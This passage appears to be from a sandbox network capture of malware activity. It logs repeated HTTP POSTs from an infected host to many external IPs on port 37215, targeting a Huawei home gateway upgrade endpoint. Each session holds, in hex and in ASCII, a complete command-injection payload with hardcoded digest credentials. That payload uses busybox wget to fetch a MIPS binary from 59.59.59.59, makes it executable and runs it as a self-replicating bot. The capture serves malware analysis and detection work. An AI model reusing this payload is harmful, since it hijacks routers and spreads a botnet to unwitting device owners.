20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1347192.168.2.1543186192.88.9.11937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.808387041 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1348192.168.2.1556966105.241.253.15837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.808418989 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1349192.168.2.154060441.124.183.25137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.803925037 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1350192.168.2.1538392156.139.150.3937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.803936005 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1351192.168.2.154557841.197.162.17337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.803956985 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1352192.168.2.1560570197.46.51.23537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.804001093 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1353192.168.2.1560790197.16.89.15237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.804018021 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1354192.168.2.1534734157.50.91.19637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.804039955 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1355192.168.2.155698241.107.91.11437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.804056883 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1356192.168.2.1538118157.183.110.6837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.804105043 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1357192.168.2.153897849.66.28.16737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.804121971 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
